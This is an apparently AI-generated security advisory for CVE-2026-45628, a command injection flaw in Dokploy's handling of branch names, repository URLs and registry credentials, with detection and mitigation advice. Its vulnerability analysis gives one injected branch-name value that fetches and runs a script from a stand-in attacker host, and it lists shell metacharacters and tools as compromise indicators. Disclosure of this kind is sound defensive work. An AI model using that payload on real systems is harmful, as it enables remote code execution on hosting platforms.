CVE-2026-45628 Overview
CVE-2026-45628 is a command injection vulnerability in Dokploy, a self-hostable Platform as a Service (PaaS). Dokploy versions 0.29.2 and earlier construct shell commands with JavaScript template literals and execute them via child_process.exec(), which runs the string through /bin/sh -c. User-supplied branch names, repository URLs, and Docker registry credentials are interpolated into these commands without escaping, so an authenticated user with application create or edit privileges can embed shell metacharacters and execute arbitrary commands on the host. The NVD entry classifies the flaw under CWE-20: Improper Input Validation; the underlying pattern is classic OS command injection.
Critical Impact
Authenticated attackers with application management privileges can execute arbitrary shell commands on the Dokploy host, compromising confidentiality and integrity of all hosted applications.
Affected Products
- Dokploy 0.29.2 and earlier
- Self-hosted Dokploy PaaS deployments
- Dokploy-managed Git repository and Docker image workflows
Discovery Timeline
- 2026-05-29 - CVE-2026-45628 published to NVD
- 2026-05-29 - Last updated in NVD database
Technical Details for CVE-2026-45628
Vulnerability Analysis
Dokploy builds shell command strings using JavaScript template literals and passes them to child_process.exec(). The Node.js exec() function invokes the command through /bin/sh -c, so any shell metacharacters in an interpolated value are interpreted by the shell rather than passed to git or docker as data. Branch names, repository URLs, and Docker registry credentials supplied by application owners flow directly into these command strings without sanitization or escaping. An authenticated user creating or editing an application can supply a crafted branch name such as "main; curl attacker.tld/x.sh | sh" and obtain arbitrary command execution under the Dokploy service account the next time the application is cloned or deployed. Because Dokploy orchestrates containers, Git clones, and registry logins on the host, the compromised process typically holds Docker socket access and filesystem privileges sufficient to pivot to other tenants on the platform.
Root Cause
The root cause is building shell command strings by interpolation and handing them to child_process.exec(), which always goes through a shell. child_process.execFile() or spawn() with an argument array (and without the shell: true option, which reintroduces the shell) pass each value to the target program as a single argv entry, so the shell never sees the values and metacharacters are inert. Dokploy neither validates nor escapes the user-controlled fields before interpolation. Removing the shell closes command injection but not argument injection: a value beginning with a dash can still be read as an option by git or docker, so ref names, URLs, and credentials should additionally be checked against an allowlist before they reach the argument array.
Attack Vector
Exploitation requires network access to the Dokploy interface and an authenticated account with application create or edit rights. The attacker submits a malicious value in any of the affected fields, including Git branch, repository URL, or Docker credentials. Dokploy then executes the resulting concatenated shell command during repository cloning, image pulls, or deployment workflows, running the injected payload with Dokploy's privileges. See the GitHub Security Advisory GHSA-3frc-cfh9-ch2c for technical details.
Detection Methods for CVE-2026-45628
Indicators of Compromise
- Unexpected child processes spawned by the Dokploy Node.js process, particularly sh, bash, curl, wget, or reverse shell binaries outside normal deploy workflows.
- Git branch names, repository URLs, or Docker credential fields containing shell metacharacters such as ;, |, `, $(, or && in Dokploy application records.
- Outbound network connections from the Dokploy host to unfamiliar domains during deployment events.
Detection Strategies
- Audit Dokploy application configurations for non-standard characters in branch names, repository URLs, and registry credentials.
- Monitor process trees rooted at the Dokploy service for shell invocations that do not match git, docker, or buildx operations.
- Review Dokploy audit logs and Git operation logs for create or edit events immediately preceding suspicious host activity.
Monitoring Recommendations
- Enable command-line argument logging on the Dokploy host through auditd or equivalent and forward to a centralized SIEM.
- Alert on Docker socket access or container creation initiated by processes other than the Dokploy backend.
- Track authentication events and privilege changes within Dokploy to identify accounts capable of triggering this vulnerability.
How to Mitigate CVE-2026-45628
Immediate Actions Required
- Upgrade Dokploy to a release later than 0.29.2 that addresses the command injection issue.
- Restrict application create and edit permissions to a minimal set of trusted operators until patched.
- Rotate any Docker registry credentials and Git tokens stored in Dokploy that may have been exposed.
- Review all existing application records for malicious values in branch, repository, and credential fields.
Patch Information
The Dokploy maintainers published advisory GHSA-3frc-cfh9-ch2c describing the issue and fix. Operators should upgrade to a fixed Dokploy release and redeploy affected instances. Verify the installed version with dokploy --version after upgrade.
Workarounds
- Place the Dokploy management interface behind a VPN or reverse proxy with strict authentication and IP allow-listing.
- Disable self-registration and require administrator approval for any account that can create or edit applications.
- Run the Dokploy service as an unprivileged user without direct Docker socket access where feasible, limiting blast radius.
# Configuration example: restrict Dokploy access via reverse proxy allow-list
# nginx snippet placed in front of the Dokploy UI
location / {
    allow 10.0.0.0/24;   # trusted management network
    deny all;
    proxy_pass http://127.0.0.1:3000;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.